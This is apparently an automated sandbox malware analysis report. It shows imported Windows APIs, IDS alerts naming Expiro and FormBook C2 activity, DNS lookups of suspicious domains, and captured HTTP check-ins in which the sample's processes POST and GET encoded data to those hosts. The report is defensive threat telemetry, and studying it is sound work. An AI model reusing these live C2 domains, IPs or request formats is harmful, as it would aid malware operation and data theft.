LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-10T17:59:06.883022+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.7 | 49699 | 54.244.188.177 | 80 | TCP
2024-12-10T18:00:10.940466+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49817 | 217.70.184.50 | 80 | TCP
2024-12-10T18:00:28.160763+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49857 | 154.23.184.207 | 80 | TCP
2024-12-10T18:00:30.848420+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49863 | 154.23.184.207 | 80 | TCP
2024-12-10T18:00:33.520193+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49870 | 154.23.184.207 | 80 | TCP
2024-12-10T18:00:36.220714+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49876 | 154.23.184.207 | 80 | TCP
2024-12-10T18:00:43.692594+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49896 | 38.165.29.234 | 80 | TCP
2024-12-10T18:00:46.368010+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49902 | 38.165.29.234 | 80 | TCP
2024-12-10T18:00:49.020270+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49908 | 38.165.29.234 | 80 | TCP
2024-12-10T18:00:52.084329+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49913 | 38.165.29.234 | 80 | TCP
2024-12-10T18:00:58.856713+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49932 | 13.248.169.48 | 80 | TCP
2024-12-10T18:01:01.616313+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49938 | 13.248.169.48 | 80 | TCP
2024-12-10T18:01:04.487555+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49944 | 13.248.169.48 | 80 | TCP
2024-12-10T18:01:07.032477+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49952 | 13.248.169.48 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 10, 2024 17:59:06.335237980 CET | 49699 | 80 | 192.168.2.7 | 54.244.188.177
Dec 10, 2024 17:59:06.454767942 CET | 80 | 49699 | 54.244.188.177 | 192.168.2.7
Dec 10, 2024 17:59:06.454878092 CET | 49699 | 80 | 192.168.2.7 | 54.244.188.177
Dec 10, 2024 17:59:06.455642939 CET | 49699 | 80 | 192.168.2.7 | 54.244.188.177
Dec 10, 2024 17:59:06.455667973 CET | 49699 | 80 | 192.168.2.7 | 54.244.188.177
Dec 10, 2024 17:59:06.575026989 CET | 80 | 49699 | 54.244.188.177 | 192.168.2.7
Dec 10, 2024 17:59:06.575100899 CET | 80 | 49699 | 54.244.188.177 | 192.168.2.7
Dec 10, 2024 17:59:06.883022070 CET | 49699 | 80 | 192.168.2.7 | 54.244.188.177
Dec 10, 2024 18:00:09.566083908 CET | 49817 | 80 | 192.168.2.7 | 217.70.184.50
Dec 10, 2024 18:00:09.690753937 CET | 80 | 49817 | 217.70.184.50 | 192.168.2.7
Dec 10, 2024 18:00:09.690975904 CET | 49817 | 80 | 192.168.2.7 | 217.70.184.50
Dec 10, 2024 18:00:09.904100895 CET | 49817 | 80 | 192.168.2.7 | 217.70.184.50
Dec 10, 2024 18:00:10.024513006 CET | 80 | 49817 | 217.70.184.50 | 192.168.2.7
Dec 10, 2024 18:00:10.940108061 CET | 80 | 49817 | 217.70.184.50 | 192.168.2.7
Dec 10, 2024 18:00:10.940170050 CET | 80 | 49817 | 217.70.184.50 | 192.168.2.7
Dec 10, 2024 18:00:10.940179110 CET | 80 | 49817 | 217.70.184.50 | 192.168.2.7
Dec 10, 2024 18:00:10.940330029 CET | 80 | 49817 | 217.70.184.50 | 192.168.2.7
Dec 10, 2024 18:00:10.940465927 CET | 49817 | 80 | 192.168.2.7 | 217.70.184.50
Dec 10, 2024 18:00:10.940465927 CET | 49817 | 80 | 192.168.2.7 | 217.70.184.50
Dec 10, 2024 18:00:10.945627928 CET | 49817 | 80 | 192.168.2.7 | 217.70.184.50
Dec 10, 2024 18:00:11.066864014 CET | 80 | 49817 | 217.70.184.50 | 192.168.2.7
Dec 10, 2024 18:00:26.517240047 CET | 49857 | 80 | 192.168.2.7 | 154.23.184.207
Dec 10, 2024 18:00:26.636739969 CET | 80 | 49857 | 154.23.184.207 | 192.168.2.7
Dec 10, 2024 18:00:26.636828899 CET | 49857 | 80 | 192.168.2.7 | 154.23.184.207
Dec 10, 2024 18:00:26.650825977 CET | 49857 | 80 | 192.168.2.7 | 154.23.184.207
Dec 10, 2024 18:00:26.770675898 CET | 80 | 49857 | 154.23.184.207 | 192.168.2.7
Dec 10, 2024 18:00:28.160763025 CET | 49857 | 80 | 192.168.2.7 | 154.23.184.207
Dec 10, 2024 18:00:28.216721058 CET | 80 | 49857 | 154.23.184.207 | 192.168.2.7
Dec 10, 2024 18:00:28.216839075 CET | 80 | 49857 | 154.23.184.207 | 192.168.2.7
Dec 10, 2024 18:00:28.216844082 CET | 49857 | 80 | 192.168.2.7 | 154.23.184.207
Dec 10, 2024 18:00:28.216902018 CET | 49857 | 80 | 192.168.2.7 | 154.23.184.207
Dec 10, 2024 18:00:28.280249119 CET | 80 | 49857 | 154.23.184.207 | 192.168.2.7
Dec 10, 2024 18:00:28.280361891 CET | 49857 | 80 | 192.168.2.7 | 154.23.184.207
Dec 10, 2024 18:00:29.203121901 CET | 49863 | 80 | 192.168.2.7 | 154.23.184.207
Dec 10, 2024 18:00:29.323152065 CET | 80 | 49863 | 154.23.184.207 | 192.168.2.7
Dec 10, 2024 18:00:29.323318958 CET | 49863 | 80 | 192.168.2.7 | 154.23.184.207
Dec 10, 2024 18:00:29.339118958 CET | 49863 | 80 | 192.168.2.7 | 154.23.184.207
                                                      Dec 10, 2024 18:00:29.604101896 CET8049863154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:30.848419905 CET4986380192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:30.981503010 CET8049863154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:30.981632948 CET4986380192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:31.868355989 CET4987080192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:31.991113901 CET8049870154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:31.991319895 CET4987080192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:32.005245924 CET4987080192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:32.124752045 CET8049870154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:32.124764919 CET8049870154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:33.520193100 CET4987080192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:33.549079895 CET8049870154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:33.549180984 CET4987080192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:33.549621105 CET8049870154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:33.549690008 CET4987080192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:33.646245956 CET8049870154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:33.646310091 CET4987080192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:34.538727045 CET4987680192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:34.660120010 CET8049876154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:34.660207033 CET4987680192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:34.669547081 CET4987680192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:34.795723915 CET8049876154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:36.220484018 CET8049876154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:36.220642090 CET8049876154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:36.220714092 CET4987680192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:36.223527908 CET4987680192.168.2.7154.23.184.207
                                                      Dec 10, 2024 18:00:36.343091965 CET8049876154.23.184.207192.168.2.7
                                                      Dec 10, 2024 18:00:42.043261051 CET4989680192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:42.162997961 CET804989638.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:42.163259029 CET4989680192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:42.177238941 CET4989680192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:42.296601057 CET804989638.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:43.692594051 CET4989680192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:43.812557936 CET804989638.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:43.812695026 CET4989680192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:44.710859060 CET4990280192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:44.830223083 CET804990238.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:44.830378056 CET4990280192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:44.844358921 CET4990280192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:44.963879108 CET804990238.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:46.368010044 CET4990280192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:46.490641117 CET804990238.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:46.490731955 CET4990280192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:47.382929087 CET4990880192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:47.502948999 CET804990838.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:47.503062963 CET4990880192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:47.517285109 CET4990880192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:47.636723042 CET804990838.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:47.637093067 CET804990838.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:49.020270109 CET4990880192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:49.140840054 CET804990838.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:49.141087055 CET4990880192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:50.053884983 CET4991380192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:50.176579952 CET804991338.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:50.176657915 CET4991380192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:50.358683109 CET4991380192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:50.484970093 CET804991338.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:52.084012032 CET804991338.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:52.084130049 CET804991338.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:52.084328890 CET4991380192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:52.087116003 CET4991380192.168.2.738.165.29.234
                                                      Dec 10, 2024 18:00:52.206809998 CET804991338.165.29.234192.168.2.7
                                                      Dec 10, 2024 18:00:57.632730007 CET4993280192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:00:57.752135992 CET804993213.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:00:57.752310038 CET4993280192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:00:57.765922070 CET4993280192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:00:57.885349989 CET804993213.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:00:58.856128931 CET804993213.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:00:58.856666088 CET804993213.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:00:58.856713057 CET4993280192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:00:59.275589943 CET4993280192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:00.289455891 CET4993880192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:00.408735037 CET804993813.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:00.409003973 CET4993880192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:00.422977924 CET4993880192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:00.542289019 CET804993813.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:01.615715027 CET804993813.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:01.616136074 CET804993813.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:01.616312981 CET4993880192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:01.926419020 CET4993880192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:03.135843039 CET4994480192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:03.255279064 CET804994413.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:03.255697966 CET4994480192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:03.276416063 CET4994480192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:03.396289110 CET804994413.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:03.396322966 CET804994413.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:04.487437010 CET804994413.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:04.487477064 CET804994413.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:04.487555027 CET4994480192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:04.785788059 CET4994480192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:05.806052923 CET4995280192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:05.927270889 CET804995213.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:05.927422047 CET4995280192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:05.939208031 CET4995280192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:06.058717966 CET804995213.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:07.031958103 CET804995213.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:07.032324076 CET804995213.248.169.48192.168.2.7
                                                      Dec 10, 2024 18:01:07.032476902 CET4995280192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:07.035036087 CET4995280192.168.2.713.248.169.48
                                                      Dec 10, 2024 18:01:07.155754089 CET804995213.248.169.48192.168.2.7
                                                       Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                       Dec 10, 2024 17:59:04.149418116 CET | 61747 | 53 | 192.168.2.7 | 1.1.1.1
                                                       Dec 10, 2024 17:59:04.727219105 CET | 53 | 61747 | 1.1.1.1 | 192.168.2.7
                                                       Dec 10, 2024 18:00:08.518945932 CET | 62499 | 53 | 192.168.2.7 | 1.1.1.1
                                                       Dec 10, 2024 18:00:09.458877087 CET | 53 | 62499 | 1.1.1.1 | 192.168.2.7
                                                       Dec 10, 2024 18:00:25.992430925 CET | 51971 | 53 | 192.168.2.7 | 1.1.1.1
                                                       Dec 10, 2024 18:00:26.514139891 CET | 53 | 51971 | 1.1.1.1 | 192.168.2.7
                                                       Dec 10, 2024 18:00:41.242650032 CET | 51131 | 53 | 192.168.2.7 | 1.1.1.1
                                                       Dec 10, 2024 18:00:42.040621996 CET | 53 | 51131 | 1.1.1.1 | 192.168.2.7
                                                       Dec 10, 2024 18:00:57.101861000 CET | 60287 | 53 | 192.168.2.7 | 1.1.1.1
                                                       Dec 10, 2024 18:00:57.629827023 CET | 53 | 60287 | 1.1.1.1 | 192.168.2.7
                                                       Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                       Dec 10, 2024 17:59:04.149418116 CET | 192.168.2.7 | 1.1.1.1 | 0xf434 | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
                                                       Dec 10, 2024 18:00:08.518945932 CET | 192.168.2.7 | 1.1.1.1 | 0xe3c7 | Standard query (0) | www.sunnyz.store | A (IP address) | IN (0x0001) | false
                                                       Dec 10, 2024 18:00:25.992430925 CET | 192.168.2.7 | 1.1.1.1 | 0x54c4 | Standard query (0) | www.d48dk.top | A (IP address) | IN (0x0001) | false
                                                       Dec 10, 2024 18:00:41.242650032 CET | 192.168.2.7 | 1.1.1.1 | 0x207f | Standard query (0) | www.8312zcksnu.bond | A (IP address) | IN (0x0001) | false
                                                       Dec 10, 2024 18:00:57.101861000 CET | 192.168.2.7 | 1.1.1.1 | 0xbda | Standard query (0) | www.snyp.shop | A (IP address) | IN (0x0001) | false
                                                       Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                       Dec 10, 2024 17:59:04.727219105 CET | 1.1.1.1 | 192.168.2.7 | 0xf434 | No error (0) | pywolwnvd.biz |  | 54.244.188.177 | A (IP address) | IN (0x0001) | false
                                                       Dec 10, 2024 18:00:09.458877087 CET | 1.1.1.1 | 192.168.2.7 | 0xe3c7 | No error (0) | www.sunnyz.store | webredir.vip.gandi.net |  | CNAME (Canonical name) | IN (0x0001) | false
                                                       Dec 10, 2024 18:00:09.458877087 CET | 1.1.1.1 | 192.168.2.7 | 0xe3c7 | No error (0) | webredir.vip.gandi.net |  | 217.70.184.50 | A (IP address) | IN (0x0001) | false
                                                       Dec 10, 2024 18:00:26.514139891 CET | 1.1.1.1 | 192.168.2.7 | 0x54c4 | No error (0) | www.d48dk.top | d48dk.top |  | CNAME (Canonical name) | IN (0x0001) | false
                                                       Dec 10, 2024 18:00:26.514139891 CET | 1.1.1.1 | 192.168.2.7 | 0x54c4 | No error (0) | d48dk.top |  | 154.23.184.207 | A (IP address) | IN (0x0001) | false
                                                       Dec 10, 2024 18:00:42.040621996 CET | 1.1.1.1 | 192.168.2.7 | 0x207f | No error (0) | www.8312zcksnu.bond |  | 38.165.29.234 | A (IP address) | IN (0x0001) | false
                                                       Dec 10, 2024 18:00:57.629827023 CET | 1.1.1.1 | 192.168.2.7 | 0xbda | No error (0) | www.snyp.shop |  | 13.248.169.48 | A (IP address) | IN (0x0001) | false
                                                       Dec 10, 2024 18:00:57.629827023 CET | 1.1.1.1 | 192.168.2.7 | 0xbda | No error (0) | www.snyp.shop |  | 76.223.54.146 | A (IP address) | IN (0x0001) | false
                                                      • pywolwnvd.biz
                                                      • www.sunnyz.store
                                                      • www.d48dk.top
                                                      • www.8312zcksnu.bond
                                                      • www.snyp.shop
                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       0 | 192.168.2.7 | 49699 | 54.244.188.177 | 80 | 7252 | C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 10, 2024 17:59:06.455642939 CET | 350 | OUT | POST /usxsp HTTP/1.1
                                                      Cache-Control: no-cache
                                                      Connection: Keep-Alive
                                                      Pragma: no-cache
                                                      Host: pywolwnvd.biz
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                      Content-Length: 830
                                                       Dec 10, 2024 17:59:06.455667973 CET | 830 | OUT | Data Raw: bc 6a 7a ee d7 c1 c1 7d 32 03 00 00 8d 6c 80 7c dd 72 41 bf 15 a8 e3 9c 9d 06 33 bd 60 04 fa 25 10 fe 5b 08 32 17 e3 6c 73 32 12 f2 69 9f ee c0 6d 11 c0 83 e3 56 52 f7 42 0c 9c e6 ad 57 c2 64 9b 23 16 58 eb 06 61 3d 73 8e ad 14 26 f7 ba 7f 74 17


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       1 | 192.168.2.7 | 49817 | 217.70.184.50 | 80 | 564 | C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 10, 2024 18:00:09.904100895 CET | 535 | OUT | GET /px6j/?PNE=e0RPRf4HVNE&66Sxjp=EbQ3Su7e0DOmvxBvG6i/QTj+RVb7/J5GOcC/Cv2Jtln7033mm9MhH2ssuuKAlvgFQYkR7TQ/BJkPMGurxzrKLb8lxYxVUxpwQ/Of0rti0wTIxJq6JAsDgXxJoFbzTbGnD1j7Uz133QdH HTTP/1.1
                                                      Host: www.sunnyz.store
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                       Dec 10, 2024 18:00:10.940108061 CET | 1236 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Tue, 10 Dec 2024 17:00:10 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Content-Security-Policy: default-src 'self'; script-src 'nonce-d01ed5c76b904f43bcaad454c783f094';
                                                      Vary: Accept-Language
                                                      Data Raw: 39 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 64 30 31 65 64 35 63 37 36 62 39 30 34 66 34 33 62 63 61 61 64 34 35 34 63 37 38 33 66 30 39 34 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED]
                                                      Data Ascii: 91c<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-d01ed5c76b904f43bcaad454c783f094';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>sunnyz.store</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class
                                                       Dec 10, 2024 18:00:10.940170050 CET | 1236 | IN | Data Raw: 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e
                                                      Data Ascii: ="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=s
                                                       Dec 10, 2024 18:00:10.940179110 CET | 160 | IN | Data Raw: 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 28 65 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 61 74 6f 62 28 65 2e 74 61 72 67 65 74 2e 64 61 74 61 73 65 74 2e 75 72 6c 29 20 2b 20 27
                                                      Data Ascii: ner('click', (e) => { window.location.replace(atob(e.target.dataset.url) + 'sunnyz.store'); }); });</script></main></div> </body></html>0


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       2 | 192.168.2.7 | 49857 | 154.23.184.207 | 80 | 564 | C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 10, 2024 18:00:26.650825977 CET | 783 | OUT | POST /9ffw/ HTTP/1.1
                                                      Host: www.d48dk.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Origin: http://www.d48dk.top
